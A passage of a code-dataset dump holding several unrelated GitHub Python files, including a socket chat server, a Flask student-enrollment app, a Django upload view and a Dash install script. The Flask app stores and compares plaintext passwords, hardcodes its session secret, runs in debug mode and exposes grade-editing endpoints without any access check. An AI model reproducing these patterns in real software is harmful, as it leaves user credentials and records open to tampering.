right')\nplt.show()","repo_name":"std-in/dataanalysis","sub_path":"dmlib/src/main/python/nlp/sentiment/SentimentMeachineLearning.py","file_name":"SentimentMeachineLearning.py","file_ext":"py","file_size_in_byte":6272,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"7444554053","text":"#--*-- coding:UTF8 --*--\nimport socket, sys\n\nhost = sys.argv[1]\nport = sys.argv[2]\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.bind( (host, port) )\ns.listen(1)\nclient, direction = s.accept()\nprint(direction)\nprint(client.getpeername())\n\nclient.send(\"Hola Cliente\\n introduzca una palabra o fin si desea terminar la conversacion\")\nwhile 1:\n data = client.recv(1024)\n if data == \"fin\\n\":\n break\n print(\"cliente > \" + data)\n palabra = input(\"Servidor > \")\n client.send(palabra)\n\nclient.close()\ns.close()","repo_name":"AlejandroPenaSanchez/Python-Tests","sub_path":"Sockets/Server-2.py","file_name":"Server-2.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19700578720","text":"from aws_cdk import (\n aws_iam as iam,\n aws_s3 as s3,\n CfnOutput,\n Stack,\n Token,\n)\nfrom constructs import Construct\n\n\nclass MyFirstCdkProjectStack(Stack):\n def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:\n super().__init__(scope, construct_id, **kwargs)\n\n # The code that defines your stack goes here\n\n s3.Bucket(\n self,\n \"myBucketId\",\n bucket_name=\"tleonhafirstcdkproject\",\n versioned=False,\n encryption=s3.BucketEncryption.S3_MANAGED,\n block_public_access=s3.BlockPublicAccess.BLOCK_ALL,\n )\n\n my_bucket = s3.Bucket(\n self,\n \"myBucketId1\",\n )\n\n sns_topic_name = \"abczys\"\n\n if not Token.is_unresolved(sns_topic_name) and len(sns_topic_name) > 10:\n raise ValueError(\"Maximum value can be only 10 characters\")\n\n print(my_bucket.bucket_name)\n\n iam.Group(\n self,\n \"gid\",\n )\n\n output_1 = CfnOutput(\n self,\n \"myBucketOutput1\",\n value=my_bucket.bucket_name,\n description=\"My first CDK Bucket\",\n export_name=\"myBucketOutput1\",\n )\n","repo_name":"tleonhardt/my-first-cdk-project","sub_path":"my_first_cdk_project/my_first_cdk_project_stack.py","file_name":"my_first_cdk_project_stack.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"21599242750","text":"from flask import Flask, render_template, jsonify, request, redirect, session, g\nfrom flask_restful import Api, Resource\nfrom flask.helpers import url_for\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_admin import Admin\nfrom flask_admin.contrib.sqla import ModelView\nfrom distutils.log import error\nimport json\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///db.sqlite'\ndb = SQLAlchemy(app)\napi = Api(app)\nadmin = Admin(app)\n# secret key requried for sessions\napp.secret_key = 'TEAM106'\n\n\nclass Users(db.Model):\n __tablename__ = 'users'\n id = db.Column(db.Integer, primary_key=True)\n username = db.Column(db.String(80), unique=True, nullable=False)\n password = db.Column(db.String(80), unique=False, nullable=False)\n # handles 1 to 1\n teachers = db.relationship(\"Teachers\", backref='users', uselist=False)\n students = db.relationship(\"Students\", backref='users', uselist=False)\n\n def __repr__(self) -> str:\n return '' % self.username\n\n\nclass Teachers(db.Model):\n __tablename__ = 'teachers'\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(80), unique=True, nullable=False)\n user_id = db.Column(db.Integer, db.ForeignKey('users.id'))\n # handles 1 to many\n classes = db.relationship('Classes', backref='teacher')\n\n def __repr__(self) -> str:\n return '' % self.name\n\n\nclass Enrollment_table(db.Model):\n __tablename__ = 'enrollment_table'\n id = db.Column(db.Integer, primary_key=True)\n class_id = db.Column('class_id', db.Integer)\n student_id = db.Column('student_id', db.Integer)\n grade = db.Column('grade', db.Integer)\n\n def __repr__(self) -> str:\n return '' % self.id\n\n\nclass Students(db.Model):\n __tablename__ = 'students'\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(80), unique=True, nullable=False)\n user_id = db.Column(db.Integer, db.ForeignKey('users.id'))\n\n def __repr__(self) -> str:\n return '' % self.name\n\n\nclass Classes(db.Model):\n __tablename__ = 'classes'\n id = db.Column(db.Integer, primary_key=True)\n course_name = db.Column(db.String(80), unique=True, nullable=False)\n teacher_id = db.Column(db.Integer, db.ForeignKey('teachers.id'))\n num_enrolled = db.Column(db.Integer, unique=False, nullable=False)\n capacity = db.Column(db.Integer, unique=False, nullable=False)\n day_time = db.Column(db.String(80), unique=False, nullable=False)\n\n def __repr__(self) -> str:\n return '' % self.course_name\n\n\nclass SecureModelView(ModelView):\n def is_accessible(self):\n try:\n return session['user_id'] == Users.query.filter_by(id=1).first().id\n except:\n return False\n\n\nadmin.add_view(SecureModelView(Classes, db.session))\nadmin.add_view(SecureModelView(Students, db.session))\nadmin.add_view(SecureModelView(Enrollment_table, db.session))\nadmin.add_view(SecureModelView(Teachers, db.session))\nadmin.add_view(SecureModelView(Users, db.session))\n\n\ndef add_class(current_class, potential_class):\n\n if(len(current_class) == 18):\n # print('here')\n current_class_days = current_class[0:3].strip()\n current_class_start = current_class[3:9].strip()\n current_class_end = current_class[10:15].strip()\n eve_current = current_class[15:].strip()\n else:\n current_class_days = current_class[0:3].strip()\n current_class_start = current_class[2:8].strip()\n current_class_end = current_class[9:14].strip()\n eve_current = current_class[14:].strip()\n if(len(potential_class) == 17):\n potential_class_days = potential_class[0:3].strip()\n potential_class_start = potential_class[2:8].strip()\n potential_class_end = potential_class[9:14].strip()\n eve_potential = potential_class[14:].strip()\n else:\n potential_class_days = potential_class[0:3].strip()\n potential_class_start = potential_class[3:9].strip()\n potential_class_end = potential_class[10:15].strip()\n eve_potential = potential_class[15:].strip()\n\n for char in current_class_days:\n if char in potential_class_days:\n if(eve_current != eve_potential):\n return True\n else:\n if((current_class_start > potential_class_start and current_class_start > potential_class_end)\n or (current_class_start < potential_class_start and current_class_end < potential_class_start)):\n return True\n else:\n return False\n return True\n\n\nclass getPotentialClasses(Resource):\n def get(self):\n if 'user_id' in session:\n query_student = Students.query.filter_by(\n user_id=session['user_id']).first()\n query = db.session.query(\n Enrollment_table.metadata.tables['enrollment_table']).all()\n class_id = []\n potential_classes = []\n current_classes = []\n\n bool_classes = []\n\n for cls in query:\n if cls[2] == query_student.id:\n class_id.append(cls[1])\n current_classes.append([cls[1], cls[2], cls[3]])\n json_data = json.loads(\"{}\")\n for cls in query:\n if cls[2] != query_student.id and cls[1] not in class_id:\n potential_classes.append([cls[1], cls[2], cls[3]])\n\n # this is calculating the number of students enrolled in potential classes\n for i, cls in enumerate(potential_classes):\n count = 0\n for q in query:\n if cls[0] == q[1]:\n count += 1\n potential_classes[i].append(count)\n for i, cls in enumerate(current_classes):\n count = 0\n for q in query:\n if cls[0] == q[1]:\n count += 1\n current_classes[i].append(count)\n # this is formatting the data to be sent out\n for cls in potential_classes:\n potential_cls = Classes.query.filter_by(id=cls[0]).first()\n potential_teacher = Teachers.query.filter_by(\n id=potential_cls.teacher_id).first()\n for cur in current_classes:\n current_cls = Classes.query.filter_by(id=cur[0]).first()\n current_teacher = Teachers.query.filter_by(\n id=current_cls.teacher_id).first()\n bool_classes.append(\n add_class(current_cls.day_time, potential_cls.day_time))\n json_data.update({cur[0]: {\"class_name\": current_cls.course_name, \"time\": current_cls.day_time,\n \"teacher_name\": current_teacher.name, \"num_enrolled\": cur[3], 'capacity': current_cls.capacity, \"addable\": 0}})\n if False not in bool_classes and cls[3] < potential_cls.capacity:\n json_data.update({cls[0]: {\"class_name\": potential_cls.course_name, \"time\": potential_cls.day_time,\n \"teacher_name\": potential_teacher.name, \"num_enrolled\": cls[3], 'capacity': potential_cls.capacity, \"addable\": 1}})\n bool_classes.clear()\n else:\n json_data.update({cls[0]: {\"class_name\": potential_cls.course_name, \"time\": potential_cls.day_time,\n \"teacher_name\": potential_teacher.name, \"num_enrolled\": cls[3], 'capacity': potential_cls.capacity, \"addable\": 0}})\n bool_classes.clear()\n return json_data\n return error(400)\n\n\nclass updateDB(Resource):\n def put(self):\n json_data = request.data\n # to double quotes to make it valid JSON\n my_json = json_data.decode('utf8').replace(\"'\", '\"')\n\n # Load the JSON to a Python list & dump it back out as formatted JSON\n data = json.loads(my_json)\n s = json.dumps(data, indent=4, sort_keys=True)\n json_data = json.loads(s)\n for name in json_data['student']:\n query_student = Students.query.filter_by(name=name).first()\n query = Enrollment_table.query.filter_by(\n student_id=query_student.id, class_id=json_data['class_id']).first()\n print(query.class_id, query.student_id)\n query.grade = json_data['student'][name]\n db.session.commit()\n\n\nclass addCourse(Resource):\n def post(self):\n json_data = json.loads(request.data)\n course = json_data[\"class_id\"]\n query_student = Students.query.filter_by(\n user_id=session['user_id']).first()\n current_cls = Classes.query.filter_by(course_name=course).first()\n enrolled1 = Enrollment_table(\n class_id=current_cls.id, student_id=query_student.id, grade=0)\n db.session.add(enrolled1)\n db.session.commit()\n return 200\n\n\nclass getClasses(Resource):\n def get(self):\n if 'user_id' in session:\n query_student = Students.query.filter_by(\n user_id=session['user_id']).first()\n query = Enrollment_table.query.all()\n list_classes = []\n # retrieve all classes for the given student\n for cls in query:\n if cls.student_id == query_student.id:\n list_classes.append(\n [cls.class_id, cls.student_id, cls.grade])\n json_data = json.loads(\"{}\")\n\n # this is calculating the number of students enrolled in 1 class\n for i, cls in enumerate(list_classes):\n count = 0\n for q in query:\n if cls[0] == q.class_id:\n count += 1\n list_classes[i].append(count)\n # this is formatting the data to be sent out\n for cls in list_classes:\n current_cls = Classes.query.filter_by(id=cls[0]).first()\n current_teacher = Teachers.query.filter_by(\n id=current_cls.teacher_id).first()\n json_data.update({cls[0]: {\"class_name\": current_cls.course_name, \"time\": current_cls.day_time,\n \"teacher_name\": current_teacher.name, \"num_enrolled\": cls[3], 'capacity': current_cls.capacity}})\n return json_data\n return error(400)\n\n\nclass getTeacherClasses(Resource):\n def get(self):\n if 'user_id' in session:\n query_teacher = Teachers.query.filter_by(\n user_id=session['user_id']).first()\n query_classes = Classes.query.filter_by(\n teacher_id=query_teacher.id).all()\n query = Enrollment_table.query.all()\n\n list_classes = []\n list_class_id = []\n # retrieve all classes for the given student\n for cls in query:\n for q in query_classes:\n if cls.class_id == q.id:\n list_classes.append(\n [cls.class_id, cls.student_id, cls.grade])\n list_class_id.append(cls.class_id)\n json_data = json.loads(\"{}\")\n\n # this is calculating the number of students enrolled in 1 class\n for i, cls in enumerate(list_classes):\n count = 0\n for q in query:\n if cls[0] == q.class_id:\n count += 1\n list_classes[i].append(count)\n # this is formatting the data to be sent out\n for cls in query_classes:\n if cls.id in list_class_id:\n index = list_class_id.index(cls.id)\n num_enrolled = list_classes[index][3]\n else:\n num_enrolled = 0\n json_data.update({cls.id: {\"class_name\": cls.course_name, \"time\": cls.day_time,\n \"teacher_name\": query_teacher.name, \"num_enrolled\": num_enrolled, 'capacity': cls.capacity}})\n return json_data\n return error(400)\n\n\napi.add_resource(getClasses, '/student/classes')\napi.add_resource(getTeacherClasses, '/teacher/classes')\napi.add_resource(updateDB, '/update_grades')\napi.add_resource(getPotentialClasses, '/student/potential_classes')\napi.add_resource(addCourse, '/student/add_course')\n# assume no user if there is in session then get user g.user for now did only student but have to add teacher also this g.user is used in student html to get name\n\n\n@app.before_request\ndef before_request():\n g.user = None\n if 'user_id' in session:\n query = Students.query.filter_by(user_id=session['user_id']).first()\n if query is None:\n query = Teachers.query.filter_by(\n user_id=session['user_id']).first()\n g.user = query\n\n\n# if there does not exist a user in session then will require them to login, if not then redirect them to student.html or teacher.html which havent implemented\n@app.route('/student')\ndef student_logged():\n if not g.user:\n return redirect(url_for('login_post'))\n return render_template('student.html')\n\n\n@app.route('/teacher')\ndef teacher_logged():\n if not g.user:\n return redirect(url_for('login_post'))\n return render_template('teacher.html')\n\n\n@app.route('/student_grades/')\ndef edit_grades(id):\n if not g.user:\n return redirect(url_for('login_post'))\n return render_template(f'edit_grades.html', id=id)\n\n\n@app.route('/student_get_grades/')\ndef edit_get_grades(id):\n query = Enrollment_table.query.all()\n data = []\n for q in query:\n if q.class_id == int(id):\n data.append([q.class_id, q.student_id, q.grade])\n json_data = json.loads(\"{}\")\n\n for i, cls in enumerate(data):\n student = Students.query.filter_by(id=cls[1]).first()\n json_data.update({i: {\"student_name\": student.name, \"grade\": cls[2]}})\n\n return json_data\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef login_post():\n if request.method == 'POST':\n session.pop('user_id', None)\n username = request.form['username']\n password = request.form['password']\n query_user = Users.query.filter_by(username=username).first()\n if query_user is not None:\n if password == query_user.password:\n session['user_id'] = query_user.id\n print(session['user_id'])\n print(Users.query.filter_by(id=1).first().id)\n if session['user_id'] == Users.query.filter_by(id=1).first().id:\n return redirect('/admin')\n query = Students.query.filter_by(user_id=query_user.id).first()\n isTeacher = False\n if query == None:\n query = Teachers.query.filter_by(\n user_id=query_user.id).first()\n isTeacher = True\n if isTeacher:\n return redirect(url_for('teacher_logged'))\n return redirect(url_for('student_logged'))\n\n else:\n return redirect(url_for('login_post'))\n return render_template('login.html')\n\n# this is to logout the user\n\n\n@app.route('/my-link/')\ndef my_link():\n # pop the user fro the current session then redirect to login\n session.pop('user_id', None)\n return redirect(url_for('login_post'))\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"koiralaaayush/Student-Enrollment-App","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":15539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37802621750","text":"import turtle\nimport random\n\ncolors = 'red', 'green', 'yellow', 'orange'\n\nscreen = turtle.Screen()\nscreen.bgcolor('black')\n\npen = turtle.Turtle()\n# pen.pencolor('yellow')\npen.pencolor(random.choice(colors))\npen.speed(0)\npen.width(5)\n\nfor x in range(360):\n pen.forward(x)\n pen.left(59)\n print(x)\n\nturtle.mainloop()\n","repo_name":"chrisogonas/coders_lab","sub_path":"dailycodingproblem/turtles.py","file_name":"turtles.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15344726442","text":"import rand_word\nimport os\nimport draw\n\nclass Game:\n\n def __init__(self):\n self.start()\n\n def start(self):\n self.chars = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']\n self.guesses = []\n self.num_of_fails = 0\n self.used_chars = ''\n self.word = rand_word.random_word()\n self.players_word = list('-' * len(self.word))\n self.game_loop()\n\n def game_loop(self):\n while self.num_of_fails < 7:\n self.update_scr()\n\n # print(self.word, self.print_players_word())\n self.guess()\n if len(self.players_guess) > 1:\n if self.players_guess == self.word:\n self.players_word = list(self.players_guess)\n self.update_scr()\n print('\\n', '\\n', 'congrats!!')\n break\n else:\n print('wrong guess!!')\n print('my word: ', self.word)\n break\n self.used_chars += self.players_guess + ' '\n if self.players_guess in self.word and self.players_guess not in self.players_word:\n self.update_players_word()\n\n if self.word == self.print_players_word():\n self.update_scr()\n print('congrats!!')\n break\n else:\n self.num_of_fails += 1\n\n self.update_scr()\n print('my word: ', self.word)\n\n def print_players_word(self):\n self.result = ''\n for i in range(len(self.players_word)):\n self.result += self.players_word[i]\n return self.result\n\n def update_players_word(self):\n for i in range(len(self.players_word)):\n if self.word[i] == self.players_guess:\n self.players_word[i] = self.players_guess\n\n def update_scr(self):\n os.system('cls' if os.name == 'nt' else 'clear')\n self.draw_man(self.num_of_fails)\n print('used characters: ',self.used_chars)\n # print(self.word)\n print('\\n',self.print_players_word(), '\\n')\n # print(self.num_of_fails, 'failures')\n\n def draw_man(self, step):\n draw.hangman_graphic(step)\n\n def guess(self):\n self.players_guess = input('What is your guess? ')\n\nguess_game = Game()\n","repo_name":"greenfox-zerda-lasers/bereczb","sub_path":"week-05/day-02/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"28223321859","text":"import timeit\nstart = timeit.default_timer()\n\n# All the program statements\n\n\ndef selSort(nlist):\n for slot in range(len(nlist)-1,0,-1):\n maxpos=0\n for location in range(1, slot+1):\n if nlist[location]>nlist[maxpos]:\n maxpos= location\n\n temp = nlist[slot]\n nlist[slot] = nlist[maxpos]\n nlist[maxpos] = temp\n\nnlist = [2,45,3,22,56,88,1212,34,9696,3,5,34,5,3,65,34,54,1,0]\nselSort(nlist)\nprint(nlist)\n\n \nstop = timeit.default_timer()\nexecution_time = stop - start\n\nprint(('{:.9f}'.format(execution_time))) # It returns time in seconds to 9 decimal places","repo_name":"tomhealy1/Algos","sub_path":"selsort.py","file_name":"selsort.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7487478459","text":"# Lab week 04, Based on Lecture 2\n# For & While loops\n\n# Write a program (evens.py) that uses a while loop to print all the even numbers from 2 to 100.\n\nnumberTo = 100\nevenNum = 2\n\nwhile evenNum <= numberTo:\n print (evenNum)\n evenNum += 2\n","repo_name":"aharring/GMITPyProg2021","sub_path":"week04/lab4.2.1.evens.py","file_name":"lab4.2.1.evens.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31631299164","text":"from django.shortcuts import render\nfrom django.http import HttpRequest\nfrom django.http import HttpResponse\nfrom django.views.generic import TemplateView\nfrom ..models import Movie, Single, Instrument,Music\nfrom django.core.files.storage import FileSystemStorage\nimport ffmpeg\nfrom mutagen.easyid3 import EasyID3\nimport mutagen.id3\n\nclass continueView(TemplateView):\n template_name = 'app/Continue.html'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n\n context['title'] = 'Continue'\n return context\n \n def post(self, request, *args, **kwargs):\n if request.method == 'POST':\n u_id = request.session['uid']\n genre = request.session['genre']\n inst = request.session['inst']\n filename = str(u_id) + \"/\" + genre + \"/\" +inst\n \n if request.is_ajax():\n #Ajax 処理を別メソッドに切り離す\n if request.FILES['movie_record']:\n movie = request.FILES['movie_record']\n fileobject = FileSystemStorage()\n #同じファイルが存在するなら削除\n if fileobject.exists(filename+\".webm\")==True:\n print(\"exist\")\n fileobject.delete(filename+\".webm\")\n\n fileobject.save((filename+\".webm\"),movie) #保存\n \"\"\"try:\n tags = EasyID3(str(\"./media/\"+filename+\".mp4\"))\n \n except mutagen.id3.ID3NoHeaderError:\n tags = mutagen.File(str(\"./media/\"+filename+\".mp4\"), easy=True)\n tags.add_tags()\n \n tag[\"length\"]=81000\n tags.save()\"\"\"\n return HttpResponse(\"ajax is done\")\n\n #動画変換\n stream = ffmpeg.input((\"./media/\"+filename+\".webm\")) \n stream = ffmpeg.output(stream, (\"./media/\"+filename+\".mp4\")) \n ffmpeg.run(stream, overwrite_output=True)\n \n #音楽抽出\n stream = ffmpeg.input(\"./media/\"+filename+\".mp4\") \n stream = ffmpeg.output(stream, (\"./media/\"+filename+\".wav\")) \n ffmpeg.run(stream, overwrite_output=True)\n\n #Musicテーブルに登録&Movieテーブルも登録\n music = Music(music = (filename + \".wav\"))\n music.save()\n m_data = Movie(movie_path=(filename + \".mp4\"),music_id=music)\n m_data.save()\n\n #Singleテーブルを更新\n instrument = Instrument.objects.get(instrument_name=inst)\n s_data = Single.objects.select_related('instrument_id').get(uid=u_id,instrument_id=instrument)\n s_data.movie_id = m_data\n s_data.save()\n\n request.session['p_flag'] = 1\n \n return render(request,'app/Continue.html')\n\nContinue = continueView.as_view()","repo_name":"pagopani/HappyJam","sub_path":"HappyJam/app/views/continueView.py","file_name":"continueView.py","file_ext":"py","file_size_in_byte":3000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25278479494","text":"# 2021 Ensomniac\n# Ryan Martin ryan@ensomniac.com\n\n\"\"\"\n| This script requires that you have an account at https://dash.guide\n|\n| This script installs PyDash, so that you can import Dash on this environment\n| This script installs the command line tool dashsync\n\"\"\"\n\nimport os\nimport sys\nimport json\nimport site\nimport getpass\nimport requests\n\n\nclass Setup:\n _dash_data: dict\n _package_paths: list\n\n def __init__(self):\n print(\"\\nDash - Tools for Developers\\n\")\n\n self.dash_data_path = os.path.join(os.path.expanduser(\"~\"), \".dash\")\n\n self.preflight()\n\n self.user = self.authenticate()\n self.package_root = os.path.dirname(os.path.realpath(__file__)) + \"/\"\n self.pydash_module_root = self.find_pydash_root()\n self.pydash_module_dest = self.find_pydash_dest()\n\n self.install_cli()\n self.link_pydash()\n\n @property\n def dash_creds(self):\n if not os.path.exists(self.dash_data_path):\n return None\n\n if not hasattr(self, \"_dash_data\"):\n self._dash_data = json.loads(open(self.dash_data_path, \"r\").read())\n\n return self._dash_data\n\n @property\n def package_paths(self):\n if not hasattr(self, \"_package_paths\"):\n self._package_paths = []\n\n all_files = [\n os.path.join(dp, f)\n for dp, dn, fn in os.walk(self.package_root)\n for f in fn\n ]\n\n for filename in all_files:\n if \".git\" in filename or \"/.D\" in filename or \".pyc\" in filename:\n continue\n\n self._package_paths.append(filename)\n\n return self._package_paths\n\n @property\n def cli_content(self):\n return \"\\n\".join([\n \"#!/bin/bash\",\n \"#\",\n f\"# Script generated by {os.path.join(os.getcwd(), __file__)}\",\n \"\",\n f\"{sys.executable} -c 'import Dash;Dash.Sync()' \"\n ])\n\n def install_cli(self):\n local_bin = os.path.join(\"/usr\", \"local\", \"bin\")\n cli_path = os.path.join(local_bin, \"dashsync\")\n\n os.makedirs(local_bin, exist_ok=True)\n\n if os.path.exists(cli_path):\n os.remove(cli_path)\n\n try:\n open(cli_path, \"w\").write(self.cli_content)\n\n except PermissionError:\n from subprocess import check_output\n\n temp_path = os.path.join(\"/var\", \"tmp\", \"dashsync\")\n\n open(temp_path, \"w\").write(self.cli_content)\n\n print(check_output(\n f'sudo mv {temp_path} {cli_path}', # sudo is necessary\n shell=True\n ).decode().strip().strip(\"\\n\"))\n\n except:\n print(\"\\nERROR: Unable to install the CPE CLI!\\n\")\n\n return\n\n if not os.path.exists(cli_path):\n sys.exit(\"\\nError: Unable to install dashsync!\\n\")\n\n os.system(f\"chmod +x {cli_path}\")\n\n print(\"\\tDash cli tool 'dashsync' installed!\")\n\n def link_pydash(self):\n if os.path.exists(self.pydash_module_dest):\n if os.path.islink(self.pydash_module_dest):\n os.unlink(self.pydash_module_dest)\n else:\n os.remove(self.pydash_module_dest)\n\n try:\n os.symlink(self.pydash_module_root, self.pydash_module_dest)\n\n except FileExistsError:\n os.remove(self.pydash_module_dest)\n os.symlink(self.pydash_module_root, self.pydash_module_dest)\n\n if not os.path.exists(self.pydash_module_dest):\n sys.exit(\"\\nError: Unable to install pydash!\\n\")\n\n print(\"\\tPydash module installed!\")\n\n def find_pydash_dest(self):\n pydash_dest = None\n\n for path in site.getsitepackages():\n if os.path.exists(path):\n pydash_dest = os.path.join(path, \"Dash\")\n\n if not pydash_dest:\n sys.exit(\"\\nError: Unable to locate your system's python site packages!\\n\")\n\n print(f\"\\tPydash module link: '{pydash_dest}'\")\n\n return pydash_dest\n\n def find_pydash_root(self):\n pydash_root = None\n\n for package_path in self.package_paths:\n if \"pydash/\" not in package_path:\n continue\n\n if \"__init__.py\" not in package_path:\n continue\n\n if \"SETUP_PYDASH\" not in open(package_path, \"r\").read():\n continue\n\n pydash_root = \"/\".join(package_path.split(\"/\")[:-1]) + \"/\"\n\n break\n\n if not pydash_root:\n sys.exit(\"\\nError: Unable to locate pydash!\\n\")\n\n print(f\"\\tPydash module: '{pydash_root}'\")\n\n return pydash_root\n\n # Checks to make sure this is being installed correctly\n def preflight(self):\n if os.path.exists(os.path.join(\"/var\", \"www\", \"vhosts\", \"oapi.co\", \"logs\")):\n sys.exit(\"\\nError: This setup.py is not intended for the server\\n\")\n\n def authenticate(self):\n if self.dash_creds:\n return\n\n if os.path.exists(self.dash_data_path):\n os.remove(self.dash_data_path)\n\n email = input(\"Enter your email (from https://dash.guide): \").strip()\n\n if not email:\n sys.exit()\n\n password = getpass.getpass(prompt=\"Enter your password: \")\n\n if not password:\n return\n\n response = requests.post(\n \"https://dash.guide/Users\",\n data={\n \"f\": \"login\",\n \"email\": email,\n \"pass\": password\n }\n ).json()\n\n if response.get(\"error\"):\n sys.exit(f\"\\nUnable to authenticate @ https://dash.guide/\\n\\tReason:\\n{response['error']}\\n\")\n\n if not response.get(\"token\"):\n sys.exit(f\"\\nUnable to authenticate @ https://dash.guide/\\n\\tReason: Unknown\\n\")\n\n dash_data = {\"user\": response}\n\n open(self.dash_data_path, \"w\").write(json.dumps(dash_data))\n\n self._dash_data = dash_data\n\n print(\"\\nSuccessfully authenticated!\\n\")\n\n return dash_data[\"user\"]\n\n\nif __name__ == \"__main__\":\n Setup()\n","repo_name":"ensomniac/dash","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":6061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22597778735","text":"#! /user/bin/env python3\nimport unittest\nfrom dshsaa.raw import settings, maindll, envdll, astrodll, timedll, tledll, sgp4dll\nimport ctypes as c\nimport pdb\n\nclass TestSgp4Dll(unittest.TestCase):\n\t\n\tdef setUp(self):\n\t\t#init maindll\n\t\tself.maindll_handle = maindll.DllMainInit()\n\t\t\n\t\t# init other dlls\n\t\tdef init_subdll(initer):\n\t\t\tretcode = initer(self.maindll_handle)\n\t\t\tif retcode != 0:\n\t\t\t\traise Exception(\"Failed to init %s with error code %i\" % ('initer.__name__', retcode))\n\t\t\n\t\tinit_subdll(timedll.TimeFuncInit)\n\t\tinit_subdll(tledll.TleInit)\n\t\tinit_subdll(envdll.EnvInit)\n\t\tinit_subdll(astrodll.AstroFuncInit)\n\t\tsgp4dll.Sgp4SetLicFilePath('./dshsaa/libdll/') #get the license before initing sgp4\n\t\tinit_subdll(sgp4dll.Sgp4Init)\n\t\t\n\t\t# open a log file\n\t\tmaindll.OpenLogFile('sgp4.log')\n\t\t\n\t\t# Initialize a TLE\n\t\tline1 = '1 25544U 98067A 19311.39056523 .00000757 00000-0 21099-4 0 9992'\n\t\tline2 = '2 25544 51.6451 11.2360 0005828 238.9618 210.3569 15.50258526197470'\n\t\tgeneric_satKey = tledll.TleAddSatFrLines(line1, line2)\n\t\tif generic_satKey.value <= 0:\n\t\t\traise Exception(\"Failed to init generic_satKey with code %i\" % generic_satKey.value)\n\t\telse:\n\t\t\tself.generic_satKey = generic_satKey\n\t\t\n\t\t# Initialize that satellite in the SGP4 context\n\t\tretcode = sgp4dll.Sgp4InitSat(generic_satKey)\n\t\tif retcode != 0:\n\t\t\traise Exception(\"Failed to init tle with code %i\" % (retcode))\n\t\n\t##Sgp4GetInfo\n\tdef test_Sgp4GetInfo(self):\n\t\tinfoStr = sgp4dll.Sgp4GetInfo()\n\t\tself.assertTrue(infoStr)\n\t\t\n\t##Sgp4GetLicFilePath \n\tdef test_Sgp4GetLicFilePath(self):\n\t\tlicFilePath = sgp4dll.Sgp4GetLicFilePath()\n\t\t\n\t##Sgp4GetPropOut\n\tdef test_Sgp4GetPropOut(self):\n\t\t# propogate a satellite\n\t\tsatKey = self.generic_satKey\n\t\tmse = 3600\n\t\t(retcode, ds50UTC, pos, vel, llh) = sgp4dll.Sgp4PropMse(satKey, mse)\n\t\tself.assertEqual(retcode, 0)\n\t\t\n\t\t# retrieve data\n\t\tfor xf_Sgp4Out in [1,2,3,4]:\n\t\t\t(retcode, destArr) = sgp4dll.Sgp4GetPropOut(satKey, xf_Sgp4Out)\n\t\t\n\t\t#TODO: Add assertEquals for data\n\t\n\t\n\t##Sgp4Init\n\tdef test_Sgp4Init(self):\n\t\t# if the setup is complete, this test is passed\n\t\t1\n\t\t\n\t##Sgp4InitSat\n\tdef test_Sgp4InitSat(self):\n\t\t# if the setup is complete, this test is passed\n\t\t1\n\t\t\n\t##Sgp4PosVelToKep\n\tdef test_Sgp4PosVelToKep(self):\n\t\tyr = 2020\n\t\tday = 11.6\n\t\t# grabbed some coords from https://spaceflight.nasa.gov/realdata/sightings/SSapplications/Post/JavaSSOP/orbit/ISS/SVPOST.html\n\t\tpos = [x/1000 for x in [3779875.33, 3487522.78, 4441142.89]]\n\t\tvel = [x/1000 for x in [-6114.409610, 2394.224646, 3312.814084]]\n\t\t(retcode, posNew, velNew, sgp4MeanKep) = sgp4dll.Sgp4PosVelToKep(yr, day, pos, vel)\n\t\t# TODO: Add real test data\n\t\n\t##Sgp4PropAll\n\tdef test_Sgp4PropAll(self):\n\t\tsatKey = self.generic_satKey\n\t\ttimeType = 0\n\t\ttimeIn = 0\n\t\t(retcode, xa_Sgp4Out) = sgp4dll.Sgp4PropAll(satKey, timeType, timeIn)\n\t\tself.assertEqual(retcode, 0)\n\t\t\n\t\tsatKey = self.generic_satKey\n\t\ttimeType = 0\n\t\ttimeIn = 3600\n\t\t(retcode, xa_Sgp4Out) = sgp4dll.Sgp4PropAll(satKey, timeType, timeIn)\n\t\tself.assertEqual(retcode, 0)\n\t\t\n\t\tsatKey = self.generic_satKey\n\t\ttimeType = 1\n\t\ttimeIn = 25852.6\n\t\t(retcode, xa_Sgp4Out) = sgp4dll.Sgp4PropAll(satKey, timeType, timeIn)\n\t\tself.assertEqual(retcode, 0)\n\t\t\n\t\t# TODO: Add data driven test results\n\t\t\n\t##Sgp4PropDs50UTC \n\tdef 